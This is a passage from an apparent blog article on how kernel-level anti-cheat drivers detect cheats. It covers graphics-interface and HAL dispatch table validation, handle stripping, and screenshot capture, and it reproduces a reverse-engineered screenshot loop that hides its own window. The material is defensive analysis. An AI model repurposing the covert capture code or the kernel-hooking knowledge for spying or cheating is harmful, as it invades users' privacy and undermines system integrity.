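/* A thread seen running on a core should resolve back to itself. */
static int has_valid_cid_entry(const cid_table_t *table, const thread_t *thread)
{
    return cid_lookup(table, thread-&gt;id) == thread;
}
</code></pre>
<p>Comparing the returned object with the captured one, and not just checking that the ID resolves, also catches a thread that reuses the ID of a legitimate entry.</p>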
<h2 id="heading-directx-graphics-kernel-monitoring">DirectX Graphics Kernel Monitoring</h2>
<p>The <code>gDxgkInterface</code> table is part of the Windows graphics subsystem, specifically used by the DirectX Graphics Kernel (<code>dxgkrnl.sys</code>). By hooking into these interfaces, cheaters can manipulate the graphics rendering pipeline to achieve various forms of cheating, such as:</p>
<ul>
<li><p><strong>Wallhacks</strong>: Allowing players to see through walls by modifying how graphics are rendered, making certain objects transparent or highlighting players through walls.</p>
</li>
<li><p><strong>Aimbots</strong>: Automatically aiming at targets by altering the input handling routines.</p>
</li>
<li><p><strong>ESP (Extrasensory Perception)</strong>: Displaying additional information on the screen, such as player names, health, and locations.</p>
</li>
</ul>
<p>Monitoring this involves a validation routine for <code>Win32kBase_DxgInterface</code> that ensures the functions within the <code>gDxgkInterface</code> table are legitimate and reside within valid memory regions.</p>
<p>We start by searching for the <code>win32kbase.sys</code> and <code>dxgkrnl.sys</code> modules.</p>
<pre><code class="lang-c"><span class="hljs-function">PRTL_MODULE_EXTENDED_INFO <span class="hljs-title">FindModuleByName</span><span class="hljs-params">(_In_ PSYSTEM_MODULES Modules, _In_ PCHAR ModuleName)</span> </span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; Modules-&gt;module_count; index++) {
        PRTL_MODULE_EXTENDED_INFO entry =
            &amp;((PRTL_MODULE_EXTENDED_INFO)(Modules-&gt;address))[index];
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(entry-&gt;FullPathName, ModuleName))
            <span class="hljs-keyword">return</span> entry;
    }

    <span class="hljs-keyword">return</span> <span class="hljs-literal">NULL</span>;
}
</code></pre>
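<p>One caveat with <code>strstr</code> is that it matches anywhere in the path, so a driver named <code>not_dxgkrnl.sys</code> would also satisfy a search for <code>dxgkrnl.sys</code>. A stricter variant compares only the final path component, ignoring case. The sketch below is plain C with made-up helper names (<code>path_basename</code>, <code>module_name_matches</code>) and is not taken from the original driver.</p>
<pre><code class="lang-c">#include &lt;ctype.h&gt;
#include &lt;string.h&gt;

/* Returns a pointer to the component after the last backslash. */
static const char *path_basename(const char *path)
{
    const char *slash = strrchr(path, '\\');
    return slash ? slash + 1 : path;
}

/* Case-insensitive exact match of the file name against `name`. */
static int module_name_matches(const char *full_path, const char *name)
{
    const char *base = path_basename(full_path);

    while (*base &amp;&amp; *name) {
        if (tolower((unsigned char)*base) != tolower((unsigned char)*name))
            return 0;
        base++;
        name++;
    }
    /* Both strings must end together, otherwise one is only a prefix. */
    return *base == '\0' &amp;&amp; *name == '\0';
}
</code></pre>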
<p>We can then attach to the <code>winlogon</code> process context using <code>KeStackAttachProcess</code>. This is needed because <code>win32kbase.sys</code> is mapped in session space, which is only addressable from a process that belongs to a session. Within this context, the function locates the <code>gDxgkInterface</code> table in <code>win32kbase.sys</code>.</p>
<pre><code class="lang-c">KeStackAttachProcess(winlogon, &amp;apc);
dxg_interface = PeFindExportByName(win32kbase-&gt;ImageBase, <span class="hljs-string">"gDxgkInterface"</span>);

<span class="hljs-keyword">if</span> (!dxg_interface) {
    status = STATUS_UNSUCCESSFUL;
    <span class="hljs-keyword">goto</span> detatch;
}
</code></pre>
<p>The entries in <code>gDxgkInterface</code> are then iterated over, starting from the fourth entry (the first three entries are housekeeping).</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">3</span>; index &lt; WIN32KBASE_DXGKRNL_INTERFACE_FUNC_COUNT + <span class="hljs-number">3</span>; index++) {
    <span class="hljs-keyword">if</span> (!dxg_interface[index])
        <span class="hljs-keyword">continue</span>;

    PVOID entry = FindChainedPointerEnding(dxg_interface[index]);
</code></pre>
<p><code>FindChainedPointerEnding</code> follows the chain of pointers, checking that each one is valid, and returns the final pointer. Each resulting entry is then validated to ensure it resides within the <code>dxgkrnl.sys</code> module's memory region.</p>
<pre><code class="lang-c"><span class="hljs-function">PVOID <span class="hljs-title">FindChainedPointerEnding</span><span class="hljs-params">(_In_ PVOID* Start)</span> </span>{
    PVOID* current = *Start;
    PVOID  prev    = Start;

    <span class="hljs-keyword">while</span> (IsValidKernelAddress(current)) {
        __try {
            prev    = current;
            current = *current;
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            <span class="hljs-keyword">return</span> prev;
        }
    }

    <span class="hljs-keyword">return</span> prev;
}
</code></pre>
<h2 id="heading-hal-dispatch-table-validation">HAL Dispatch Table Validation</h2>
<p><code>HalDispatchTable</code> and <code>HalPrivateDispatchTable</code> are structures in the Windows operating system kernel that contain function pointers to various hardware abstraction layer (HAL) routines. These tables are critical for the operation of the HAL, which abstracts hardware-specific details from the rest of the operating system, providing a consistent interface for hardware interaction. As these structures contain pointers to essential HAL functions that manage hardware resources, <a target="_blank" href="https://revers.engineering/fun-with-pg-compliant-hook/">cheats can work by hooking into these structures</a>.</p>
<p>For <code>HalDispatchTable</code>, we iterate through predefined function pointers, verifying that they reside within valid kernel memory regions.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC VOID <span class="hljs-title">ValidateHalDispatchTable</span><span class="hljs-params">(_Out_ PVOID* Routine, _In_ PSYSTEM_MODULES Modules)</span> </span>{
    *Routine = <span class="hljs-literal">NULL</span>;
    DEBUG_VERBOSE(<span class="hljs-string">"Validating HalDispatchTable."</span>);

    <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(HalQuerySystemInformation, Modules)) {
        *Routine = HalQuerySystemInformation;
        <span class="hljs-keyword">goto</span> end;
    }

    <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(HalSetSystemInformation, Modules)) {
        *Routine = HalSetSystemInformation;
        <span class="hljs-keyword">goto</span> end;
    }

    <span class="hljs-comment">// ...</span>

end:
    <span class="hljs-keyword">return</span>;
}
</code></pre>
<p>We check whether each routine pointer (<code>HalQuerySystemInformation</code>, <code>HalSetSystemInformation</code>, etc.) is within a valid region of memory. If any pointer is found to be invalid, the function sets the <code>Routine</code> pointer to the invalid function and exits. Each function pointer in the <code>HalDispatchTable</code> is validated sequentially.</p>
<p>For <code>HalPrivateDispatchTable</code>, this task is a bit more difficult. It is not as well documented as <code>HalDispatchTable</code> because it is reserved for hardware-specific functions that are not exposed through standard HAL interfaces. This table is also slightly more complex because <a target="_blank" href="https://www.vergiliusproject.com/kernels/x64/Windows%2011/22H2%20\(2022%20Update\)/HAL_PRIVATE_DISPATCH">its size varies</a> depending on the Windows version.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC NTSTATUS <span class="hljs-title">ValidateHalPrivateDispatchTable</span><span class="hljs-params">(_Out_ PVOID* Routine, _In_ PSYSTEM_MODULES Modules)</span> </span>{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    PVOID table = <span class="hljs-literal">NULL</span>;
    UNICODE_STRING <span class="hljs-built_in">string</span> = RTL_CONSTANT_STRING(<span class="hljs-string">L"HalPrivateDispatchTable"</span>);
    PVOID* base = <span class="hljs-literal">NULL</span>;
    RTL_OSVERSIONINFOW os_info = {<span class="hljs-number">0</span>};
    UINT32 count = <span class="hljs-number">0</span>;

    DEBUG_VERBOSE(<span class="hljs-string">"Validating HalPrivateDispatchTable."</span>);

    table = ImpMmGetSystemRoutineAddress(&amp;<span class="hljs-built_in">string</span>);

    <span class="hljs-keyword">if</span> (!table) <span class="hljs-keyword">return</span> status;

    status = GetOsVersionInformation(&amp;os_info);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetOsVersionInformation failed with status %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    base  = (UINT64)table + <span class="hljs-keyword">sizeof</span>(UINT64);
    count = GetHalPrivateDispatchTableRoutineCount(&amp;os_info);

    ValidateTableDispatchRoutines(base, count, Modules, Routine);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We can first retrieve the address of the <code>HalPrivateDispatchTable</code>, then determine the number of entries in the table based on the OS version, obtained by calling <code>GetOsVersionInformation</code>. The routine count is computed by <code>GetHalPrivateDispatchTableRoutineCount</code>, which checks the OS build number and returns the appropriate size.</p>
<p>We then iterate through each entry in the <code>HalPrivateDispatchTable</code> in the same way, checking whether each routine pointer resides within a valid memory region. If an invalid pointer is found, the function sets the <code>Routine</code> pointer to that entry. Because the loop does not stop early, the last invalid entry found is the one reported.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC VOID <span class="hljs-title">ValidateTableDispatchRoutines</span><span class="hljs-params">(_In_ PVOID* Base, _In_ UINT32 Entries, _In_ PSYSTEM_MODULES Modules, _Out_ PVOID* Routine)</span> </span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; Entries; index++) {
        <span class="hljs-keyword">if</span> (!Base[index]) <span class="hljs-keyword">continue</span>;

        <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(Base[index], Modules))
            *Routine = Base[index];
    }
}
</code></pre>
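<p>The same loop can be modelled outside the kernel to show two design choices: treating each module as a half-open range <code>[base, base + size)</code>, and stopping at the first bad entry instead of overwriting the result on each hit. The <code>module_range_t</code> type and both helpers are illustrative names, not part of the driver.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

typedef struct {
    uint64_t base;
    uint64_t size;
} module_range_t;

/* True if `address` lies inside any module's [base, base + size). */
static int is_in_any_module(uint64_t address, const module_range_t *modules,
                            size_t module_count)
{
    for (size_t i = 0; i &lt; module_count; i++) {
        if (address &gt;= modules[i].base &amp;&amp;
            address - modules[i].base &lt; modules[i].size)
            return 1;
    }
    return 0;
}

/* Returns the index of the first non-null entry that points outside every
 * module, or -1 if the whole table looks clean. */
static int first_invalid_entry(const uint64_t *table, size_t entries,
                               const module_range_t *modules,
                               size_t module_count)
{
    for (size_t i = 0; i &lt; entries; i++) {
        if (table[i] == 0)
            continue; /* unused slot */
        if (!is_in_any_module(table[i], modules, module_count))
            return (int)i;
    }
    return -1;
}
</code></pre>
<p>Writing the upper bound as <code>address - base &lt; size</code> keeps the address one past the end of a module out of the valid range and avoids overflow in <code>base + size</code>.</p>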
<h2 id="heading-handle-stripping-via-object-callbacks">Handle Stripping via Object Callbacks</h2>
<p>Cheat programs often try to open handles to game processes to read or write memory, inject code, or manipulate the game's execution. By intercepting handle creation and duplication requests through object callbacks, the anti-cheat driver can inspect these requests and deny access if they are deemed unauthorized.</p>
<p>By stripping handles and denying unauthorized access, the anti-cheat driver ensures that the game process and other related processes maintain their integrity. We can start by registering callback routines for process objects. Thread objects can be covered the same way by registering a second entry for <code>PsThreadType</code>.</p>
<pre><code class="lang-c">OB_CALLBACK_REGISTRATION callbackRegistration;
OB_OPERATION_REGISTRATION operationRegistration[<span class="hljs-number">1</span>];

RtlZeroMemory(&amp;callbackRegistration, <span class="hljs-keyword">sizeof</span>(OB_CALLBACK_REGISTRATION));
RtlZeroMemory(&amp;operationRegistration, <span class="hljs-keyword">sizeof</span>(OB_OPERATION_REGISTRATION));

operationRegistration[<span class="hljs-number">0</span>].ObjectType = PsProcessType;
operationRegistration[<span class="hljs-number">0</span>].Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE;
operationRegistration[<span class="hljs-number">0</span>].PreOperation = ObPreOpCallbackRoutine;
operationRegistration[<span class="hljs-number">0</span>].PostOperation = ObPostOpCallbackRoutine;

callbackRegistration.Version = OB_FLT_REGISTRATION_VERSION;
callbackRegistration.OperationRegistrationCount = <span class="hljs-number">1</span>;
RtlInitUnicodeString(&amp;callbackRegistration.Altitude, <span class="hljs-string">L"320000"</span>);
callbackRegistration.RegistrationContext = <span class="hljs-literal">NULL</span>;
callbackRegistration.OperationRegistration = operationRegistration;

NTSTATUS status = ObRegisterCallbacks(&amp;callbackRegistration, &amp;callbackHandle);
<span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
    <span class="hljs-comment">// handle errors</span>
}
</code></pre>
<p>Then we need to check if the object type is a process and if the operation is handle creation or duplication. After that we need to inspect the handle attributes to determine if the handle request is unauthorized. If it is, we strip the handle by modifying the desired access rights.</p>
<pre><code class="lang-c"><span class="hljs-function">OB_PREOP_CALLBACK_STATUS <span class="hljs-title">ObPreOpCallbackRoutine</span><span class="hljs-params">(
    PVOID RegistrationContext,
    POB_PRE_OPERATION_INFORMATION OperationInformation)</span>
</span>{
    PAGED_CODE();

    UNREFERENCED_PARAMETER(RegistrationContext);

    ACCESS_MASK deny_access = SYNCHRONIZE | PROCESS_TERMINATE;

    PEPROCESS process_creator = PsGetCurrentProcess();
    PEPROCESS target_process = (PEPROCESS)OperationInformation-&gt;Object;
    HANDLE process_creator_id = ImpPsGetProcessId(process_creator);
    LPCSTR process_creator_name = ImpPsGetProcessImageFileName(process_creator);
    LPCSTR target_process_name = ImpPsGetProcessImageFileName(target_process);

    <span class="hljs-keyword">if</span> (!process_creator_name || !target_process_name)
        <span class="hljs-keyword">return</span> OB_PREOP_SUCCESS;

    <span class="hljs-comment">// check if the process is whitelisted</span>
    <span class="hljs-keyword">if</span> (IsWhitelistedHandleOpenProcess(process_creator_name) ||
        !<span class="hljs-built_in">strcmp</span>(process_creator_name, target_process_name)) {
        <span class="hljs-keyword">return</span> OB_PREOP_SUCCESS;
    }

    <span class="hljs-comment">// deny access if the process is not whitelisted</span>
    OperationInformation-&gt;Parameters-&gt;CreateHandleInformation.DesiredAccess = deny_access;
    OperationInformation-&gt;Parameters-&gt;DuplicateHandleInformation.DesiredAccess = deny_access;

    <span class="hljs-keyword">return</span> OB_PREOP_SUCCESS;
}
</code></pre>
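<p>A detail worth spelling out is how the access mask is reduced. Assigning a fixed mask sets bits the caller may never have requested, whereas AND-ing with an allow-list can only clear bits. The following user-mode sketch shows the AND form. The constants carry the values from the Windows SDK headers, and <code>strip_access</code> is a hypothetical helper, not the callback itself.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Values as defined in the Windows SDK headers. */
#define SYNCHRONIZE        0x00100000u
#define PROCESS_TERMINATE  0x0001u
#define PROCESS_VM_READ    0x0010u
#define PROCESS_VM_WRITE   0x0020u

/* Keeps only the requested rights that are also on the allow-list. */
static uint32_t strip_access(uint32_t desired, uint32_t allowed)
{
    return desired &amp; allowed;
}
</code></pre>
<p>With this form, a request for <code>PROCESS_VM_READ | SYNCHRONIZE</code> against an allow-list of <code>SYNCHRONIZE | PROCESS_TERMINATE</code> comes back as <code>SYNCHRONIZE</code> only.</p>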
<p>When stripping handles this way, we also want to exempt certain processes. Common user-installed programs like Discord and Steam, or essential Windows services, should be whitelisted to avoid breaking them or causing system instability.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> PROCESS_HANDLE_OPEN_WHITELIST_COUNT 3</span>

CHAR PROCESS_HANDLE_OPEN_WHITELIST[PROCESS_HANDLE_OPEN_WHITELIST_COUNT]
                                  [MAX_PROCESS_NAME_LENGTH] = {<span class="hljs-string">"Discord.exe"</span>,
                                                               <span class="hljs-string">"svchost.exe"</span>,
                                                               <span class="hljs-string">"explorer.exe"</span>};

<span class="hljs-function">STATIC
BOOLEAN
<span class="hljs-title">IsWhitelistedHandleOpenProcess</span><span class="hljs-params">(_In_ LPCSTR ProcessName)</span>
</span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; PROCESS_HANDLE_OPEN_WHITELIST_COUNT;
         index++) {
        <span class="hljs-keyword">if</span> (!<span class="hljs-built_in">strcmp</span>(ProcessName, PROCESS_HANDLE_OPEN_WHITELIST[index]))
            <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<h2 id="heading-screenshot-gathering">Screenshot Gathering</h2>
<p>This is probably one of the most egregious cases of anticheat overreach and is probably what comes to mind when people talk about kernel-level anticheats. The most popular example is when <a target="_blank" href="https://x.com/w_sted">@w_sted</a> reported that Valorant was taking full-display screenshots of user devices, but this was subsequently debunked by <a target="_blank" href="https://x.com/daaximus/status/1786224313223323726">@daaximus</a>, who said the screenshotting only covers the active window (that is, only the game).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1719045805549/ba4ad5bb-99c5-425d-b669-68f59dab246a.png" alt class="image--center mx-auto" /></p>
<p>In the context of a kernel-level anti-cheat system, this code is designed to capture screenshots of a user's desktop or a specific window at regular intervals, likely for the purpose of monitoring and ensuring the integrity of the gameplay environment. The code includes functionalities to minimize or hide the capture window under certain conditions, like when the user presses specific keys, which is common in anti-cheat mechanisms to prevent tampering.</p>
<p>Impressively, <a target="_blank" href="https://x.com/daaximus/status/1786224313223323726">@daaximus</a> provided a full approximate recreation of the function based on the reverse-engineered snippet. The core of the implementation revolves around GDI+ for capturing and saving screenshots. The GDI+ library is initialized at the beginning of the screenshot capture function to facilitate image encoding and saving in PNG format.</p>
<pre><code class="lang-c">GdiplusStartupInput gdipsi;
ULONG_PTR token;
GdiplusStartup(&amp;token, &amp;gdipsi, <span class="hljs-literal">nullptr</span>);
</code></pre>
<p>The <code>get_encoder_clsid</code> function fetches the CLSID of the image encoder for PNG files, which is necessary for saving the captured images in the correct format. This function iterates through the available image encoders and matches the requested format to return the appropriate CLSID.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">get_encoder_clsid</span><span class="hljs-params">(<span class="hljs-keyword">const</span> WCHAR* format, CLSID* clsid)</span> </span>{
    UINT num_encoders = <span class="hljs-number">0</span>;
    UINT size_encoders = <span class="hljs-number">0</span>;
    ImageCodecInfo* codec_info = <span class="hljs-literal">nullptr</span>;
    GetImageEncodersSize(&amp;num_encoders, &amp;size_encoders);

    <span class="hljs-keyword">if</span> (size_encoders == <span class="hljs-number">0</span>) <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;

    codec_info = <span class="hljs-keyword">static_cast</span>&lt;ImageCodecInfo*&gt;(<span class="hljs-built_in">malloc</span>(size_encoders));

    <span class="hljs-keyword">if</span> (codec_info == <span class="hljs-literal">nullptr</span>) <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;

    GetImageEncoders(num_encoders, size_encoders, codec_info);

    <span class="hljs-keyword">for</span> (UINT it = <span class="hljs-number">0</span>; it &lt; num_encoders; ++it) {
        <span class="hljs-keyword">if</span> (wcscmp(codec_info[it].MimeType, format) == <span class="hljs-number">0</span>) {
            *clsid = codec_info[it].Clsid;
            <span class="hljs-built_in">free</span>(codec_info);
            <span class="hljs-keyword">return</span> it;
        }
    }
    <span class="hljs-built_in">free</span>(codec_info);
    <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;
}
</code></pre>
<p>The <code>capture_screenshot</code> function takes a file name and an optional window handle (<code>hwnd</code>). It determines the screen dimensions to capture, either the entire virtual screen or the dimensions of the specified window. The function creates a compatible bitmap and device context to store the captured screen content.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">capture_screenshot</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-built_in">std</span>::<span class="hljs-built_in">wstring</span>&amp; filename, HWND hwnd)</span> </span>{
    <span class="hljs-keyword">const</span> HDC hdc_screen = GetDC(<span class="hljs-literal">nullptr</span>);
    <span class="hljs-keyword">const</span> HDC hdc_capture = CreateCompatibleDC(hdc_screen);

    <span class="hljs-keyword">int</span> left = GetSystemMetrics(SM_XVIRTUALSCREEN);
    <span class="hljs-keyword">int</span> top = GetSystemMetrics(SM_YVIRTUALSCREEN);
    <span class="hljs-keyword">int</span> width = GetSystemMetrics(SM_CXVIRTUALSCREEN);
    <span class="hljs-keyword">int</span> height = GetSystemMetrics(SM_CYVIRTUALSCREEN);

    <span class="hljs-keyword">if</span> (hwnd != <span class="hljs-literal">nullptr</span>) {
        RECT window_rect;
        GetWindowRect(hwnd, &amp;window_rect);
        left = window_rect.left;
        top = window_rect.top;
        width = window_rect.right - window_rect.left;
        height = window_rect.bottom - window_rect.top;
    }

    <span class="hljs-keyword">const</span> HBITMAP hbm = CreateCompatibleBitmap(hdc_screen, width, height);
    SelectObject(hdc_capture, hbm);
    BitBlt(hdc_capture, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, width, height, hdc_screen, left, top, SRCCOPY);

    Bitmap* bitmap = Bitmap::FromHBITMAP(hbm, <span class="hljs-literal">nullptr</span>);

    CLSID png_clsid;
    get_encoder_clsid(<span class="hljs-string">L"image/png"</span>, &amp;png_clsid);

    bitmap-&gt;Save(filename.c_str(), &amp;png_clsid, <span class="hljs-literal">nullptr</span>);

    <span class="hljs-keyword">delete</span> bitmap;
    DeleteObject(hbm);
    DeleteDC(hdc_capture);
    ReleaseDC(<span class="hljs-literal">nullptr</span>, hdc_screen);
    GdiplusShutdown(token);
}
</code></pre>
<p>The application includes a custom window procedure (<code>window_proc</code>) to handle various Windows messages. This procedure ensures that the capture window minimizes or hides itself under certain conditions, such as when the user presses the Alt+Tab combination or the Windows key. This behavior prevents the window from interfering with the user's actions and hides the presence of the anti-cheat mechanism.</p>
<pre><code class="lang-c"><span class="hljs-function">LRESULT CALLBACK <span class="hljs-title">window_proc</span><span class="hljs-params">(HWND hwnd, UINT message, WPARAM wparam, LPARAM lparam)</span> </span>{
    <span class="hljs-keyword">switch</span> (message) {
        <span class="hljs-keyword">case</span> WM_DESTROY:
            PostQuitMessage(<span class="hljs-number">0</span>);
            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
        <span class="hljs-keyword">case</span> WM_ACTIVATE:
            <span class="hljs-keyword">if</span> (wparam == WA_INACTIVE) {
                ShowWindow(hwnd, SW_MINIMIZE);
                <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
            }
            <span class="hljs-keyword">break</span>;
        <span class="hljs-keyword">case</span> WM_KEYDOWN:
            <span class="hljs-keyword">switch</span> (wparam) {
                <span class="hljs-keyword">case</span> VK_TAB:
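                    <span class="hljs-comment">// The high-order bit means Alt is currently held; the low bit only reports toggle state.</span>
                    <span class="hljs-keyword">if</span> ((GetKeyState(VK_MENU) &amp; <span class="hljs-number">0x8000</span>) != <span class="hljs-number">0</span>)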
                        ShowWindow(hwnd, SW_MINIMIZE);
                    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
                <span class="hljs-keyword">case</span> VK_LWIN:
                <span class="hljs-keyword">case</span> VK_RWIN:
                    ShowWindow(hwnd, SW_MINIMIZE);
                    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
                <span class="hljs-keyword">case</span> VK_ESCAPE:
                    PostQuitMessage(<span class="hljs-number">0</span>);
                    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
                <span class="hljs-keyword">default</span>: <span class="hljs-keyword">break</span>;
            }
            <span class="hljs-keyword">break</span>;
        <span class="hljs-keyword">default</span>: <span class="hljs-keyword">break</span>;
    }
    <span class="hljs-keyword">return</span> DefWindowProc(hwnd, message, wparam, lparam);
}
</code></pre>
<p>The main functionality of continuously capturing screenshots is managed by the <code>capture_gamers</code> function, which runs in an infinite loop on a separate thread. This function checks if the user has pressed the F1 key to toggle between capturing the specified window (if any) and capturing the entire screen. The function increments a counter to generate unique file names for each screenshot and calls <code>capture_screenshot</code> to perform the capture and saving process. The loop includes a delay (using <code>Sleep(1000)</code>) to capture screenshots at one-second intervals.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">capture_gamers</span><span class="hljs-params">()</span> </span>{
    HWND backup_hwnd = main_window;

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">auto</span> n = <span class="hljs-number">0</span>;; n++) {
        <span class="hljs-keyword">if</span> (GetAsyncKeyState(VK_F1) &amp; <span class="hljs-number">0x1</span>) {
            <span class="hljs-keyword">if</span> (main_window)
                main_window = <span class="hljs-literal">nullptr</span>;
            <span class="hljs-keyword">else</span>
                main_window = backup_hwnd;
        }

        <span class="hljs-built_in">std</span>::<span class="hljs-built_in">wstring</span> filename = <span class="hljs-string">L"ss_"</span> + <span class="hljs-built_in">std</span>::to_wstring(n) + <span class="hljs-string">L".png"</span>;
        capture_screenshot(filename, main_window);
        Sleep(<span class="hljs-number">1000</span>);
    }
}
</code></pre>
<p>The main entry point of the application, <code>WinMain</code>, sets up and registers a window class and creates a window. It then shows and updates the window, and starts the screenshot capture thread by creating a new thread running the <code>capture_gamers</code> function. The application enters a message loop to handle messages sent to the window, ensuring it remains responsive.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">int</span> WINAPI <span class="hljs-title">WinMain</span><span class="hljs-params">(HINSTANCE instance, HINSTANCE prev_instance, LPSTR cmd_line, <span class="hljs-keyword">int</span> cmd_show)</span> </span>{
    WNDCLASSEX wcex;
    wcex.cbSize = <span class="hljs-keyword">sizeof</span>(WNDCLASSEX);
    wcex.style = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc = window_proc;
    wcex.cbClsExtra = <span class="hljs-number">0</span>;
    wcex.cbWndExtra = <span class="hljs-number">0</span>;
    wcex.hInstance = instance;
    wcex.hIcon = LoadIcon(<span class="hljs-literal">NULL</span>, IDI_APPLICATION);
    wcex.hCursor = LoadCursor(<span class="hljs-literal">NULL</span>, IDC_ARROW);
    wcex.hbrBackground = HBRUSH(COLOR_WINDOW + <span class="hljs-number">1</span>);
    wcex.lpszMenuName = <span class="hljs-literal">NULL</span>;
    wcex.lpszClassName = <span class="hljs-string">L"OhNoScreenshots"</span>;
    wcex.hIconSm = LoadIcon(<span class="hljs-literal">NULL</span>, IDI_APPLICATION);
    RegisterClassEx(&amp;wcex);

    main_window = CreateWindowEx(
        <span class="hljs-number">0</span>,
        <span class="hljs-string">L"OhNoScreenshots"</span>,
        <span class="hljs-string">L"FairFight Never Did This! /s"</span>,
        WS_POPUP | WS_VISIBLE,
        <span class="hljs-number">0</span>, <span class="hljs-number">0</span>,
        GetSystemMetrics(SM_CXSCREEN),
        GetSystemMetrics(SM_CYSCREEN),
        <span class="hljs-literal">nullptr</span>, <span class="hljs-literal">nullptr</span>,
        instance, <span class="hljs-literal">nullptr</span>);

    ShowWindow(main_window, cmd_show);
    UpdateWindow(main_window);

    CreateThread(<span class="hljs-literal">nullptr</span>, <span class="hljs-number">0</span>, <span class="hljs-keyword">reinterpret_cast</span>&lt;LPTHREAD_START_ROUTINE&gt;(capture_gamers), <span class="hljs-literal">nullptr</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">nullptr</span>);

    MSG msg;
    <span class="hljs-keyword">while</span> (GetMessage(&amp;msg, <span class="hljs-literal">nullptr</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>)) {
        TranslateMessage(&amp;msg);
        DispatchMessage(&amp;msg);
    }

    <span class="hljs-keyword">return</span> <span class="hljs-keyword">int</span>(msg.wParam);
}
</code></pre>
<p>If the game window is valid (i.e., the <code>hwnd</code> is not null), the application captures only the active window, which is typically the game window. This ensures the anti-cheat mechanism monitors only the game environment. If the user switches away from the game using Alt+Tab, the capture window becomes inactive, and the application stops capturing to avoid recording irrelevant content. If the <code>hwnd</code> is null, the application captures the entire screen, which is not a normal behavior under typical operations but serves as a fallback to ensure continuous monitoring even if the specific window handle becomes invalid.</p>
<p>Some other anticheats use more aggressive methods, as shown by <a target="_blank" href="https://x.com/koyzdev">@koyzdev</a>'s findings on how ACE (Anti Cheat Expert) works. ACE is used in the game Arena Breakout: Infinite, made by Morefun Studio, which is a direct subsidiary of Tencent Games.</p>
<p>The particular issue comes from the screenshot-taking capabilities of ACE's user-mode component, ACE-Safe.dll. The function in ACE-Safe.dll begins by checking the Windows version with the following line:</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (GetVersion() &gt;= <span class="hljs-number">0x80000000</span> || (result = check_window_station(), result &lt;= <span class="hljs-number">0</span>))
</code></pre>
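<p>To make the short-circuit in that condition easier to follow, here is a minimal, portable sketch of its shape. The function names and the <code>station_check_result</code> parameter are hypothetical stand-ins (the latter for whatever <code>check_window_station()</code> returns); only the bit test and the <code>&lt;= 0</code> comparison come from the decompiled line.</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* GetVersion() sets the high-order bit on non-NT platforms (Windows 95/98/Me). */
static bool is_non_nt_platform(uint32_t version)
{
    return (version &amp; 0x80000000u) != 0;   /* same test as version &gt;= 0x80000000 */
}

/* Hypothetical model of the decompiled condition. */
static bool condition_is_true(uint32_t version, int station_check_result)
{
    /* On non-NT platforms the left side is already true, so the window
       station result is never consulted (short-circuit evaluation). */
    return is_non_nt_platform(version) || station_check_result &lt;= 0;
}
</code></pre>
<p>Under this model, the outcome on any NT-based Windows depends entirely on the window station check.</p>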
<p>The <code>GetVersion()</code> comparison tests the high-order bit of the returned value, which is set only on non-NT platforms such as Windows 95, 98, and Me; on NT-based systems (Windows NT, 2000, XP, and later) that bit is clear. Because <code>||</code> short-circuits, the Window Station name is only checked on NT-based systems. If the Window Station name does not contain "Service-0x", the function proceeds. This is a preliminary check to ensure compatibility and execution context. Next, the function creates a device context for the primary display.</p>
<pre><code class="lang-c">hdcSrc = CreateDCW(<span class="hljs-string">L"DISPLAY"</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
CompatDC = CreateCompatibleDC(hdcSrc);
</code></pre>
